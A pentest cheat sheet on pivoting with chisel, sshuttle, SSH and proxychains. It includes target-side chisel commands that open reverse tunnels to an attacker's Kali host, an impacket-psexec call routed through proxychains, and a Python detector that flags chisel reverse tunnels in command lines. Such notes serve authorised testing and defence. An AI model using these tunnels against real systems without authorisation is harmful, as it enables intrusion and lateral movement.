Port Forwarding - Tunneling
Chisel
Port forwarding,
Forwarding remote port 8080 to localhost
On kali,
./chisel server --reverse --port 9001
On target,
.\chisel.exe client <kali-ip>:9001 R:<local-port>:127.0.0.1:<target-port>
example,
.\chisel.exe client 10.10.14.38:9001 R:8080:127.0.0.1:8080
SOCKS5 proxy with chisel,
On kali,
./chisel server -p 9001 --socks5 --reverse
On target,
chisel client <kali-ip>:9001 R:5000:socks
In R:5000:socks, the R means that we want to perform a reverse port forward; 5000 will be the port on the attacker machine that will act as the entry point to our SOCKS5 proxy; and socks simply means we are using the SOCKS protocol.
Add "socks5 127.0.0.1 5000" to /etc/proxychains.conf
Don't forget to disable DNS resolution over proxychains.
UDP port forward,
/opt/chisel/chisel_1.7.7_linux_386 server --reverse --port 9001
./chisel_1.7.7_linux_386 client 192.168.119.203:9001 R:10.1.1.89:1978/udp
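An added example, not part of the original notes: a defender-side check that decodes the chisel remote specs shown above and flags reverse tunnels in process command lines. The regex covers only the spec forms used on this page; the 1080 default for a bare socks remote, the function names, and the sample log lines are assumptions.

```python
import re

# Remote spec forms seen on this page: [R:][local-port:]host:port[/udp]
# and [R:][local-port:]socks. Local-host and stdio forms are not handled.
REMOTE_RE = re.compile(
    r"^(?P<rev>R:)?(?:(?P<lport>\d+):)?"
    r"(?:(?P<socks>socks)|(?P<rhost>[^:/\s]+):(?P<rport>\d+))"
    r"(?:/(?P<proto>tcp|udp))?$"
)

def parse_remote(spec):
    """Decode one remote spec into a dict, or return None if it does not match."""
    m = REMOTE_RE.match(spec)
    if not m:
        return None
    if m["socks"]:
        target = "socks"
        listen = int(m["lport"]) if m["lport"] else 1080  # assumed default
    else:
        target = f"{m['rhost']}:{m['rport']}"
        listen = int(m["lport"] or m["rport"])  # listener port defaults to target port
    return {"reverse": bool(m["rev"]), "listen_port": listen,
            "target": target, "proto": m["proto"] or "tcp"}

def find_reverse_tunnels(cmdlines):
    """Return (cmdline, decoded remote) for chisel client runs with an R: remote."""
    hits = []
    for line in cmdlines:
        tokens = line.split()
        if "client" not in tokens:
            continue
        idx = tokens.index("client")
        # Name match only: a renamed binary needs hash or behaviour-based detection.
        if not any("chisel" in t.lower() for t in tokens[:idx]):
            continue
        for tok in tokens[idx + 1:]:
            remote = parse_remote(tok)
            if remote and remote["reverse"]:
                hits.append((line, remote))
    return hits

# Constructed process-creation log lines; the chisel commands are the ones above.
SAMPLE = [
    r".\chisel.exe client 10.10.14.38:9001 R:8080:127.0.0.1:8080",
    "chisel client 10.10.14.38:9001 R:5000:socks",
    "./chisel_1.7.7_linux_386 client 192.168.119.203:9001 R:10.1.1.89:1978/udp",
    "ssh -L 127.0.0.1:1978:10.10.10.99:1978 user@host.example",
]
if __name__ == "__main__":
    for line, r in find_reverse_tunnels(SAMPLE):
        print(f"{r['proto']} :{r['listen_port']} on server -> {r['target']}  [{line}]")
```
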
Sshuttle
This is the best tunneling tool
Standalone (compiled and ready to be executed) binaries,
sshuttle -vvv -e 'ssh -i id_rsa' -r [email protected] -x 10.11.1.252 10.2.2.1/24
sudo ./sshuttle -e "ssh -o KexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-dss -c 3des-cbc" -r [email protected]:22000 10.2.2.1/24
SSH
Port forwarding,
Forwards remote host 10.10.10.99:2049 back to localhost:2049
ssh -L 127.0.0.1:1978:10.10.10.99:1978 [email protected]
Tunneling,
ssh [email protected] -p22000 -D 127.0.0.1:1080
proxychains firefox
proxychains impacket-psexec [email protected]
Regeorg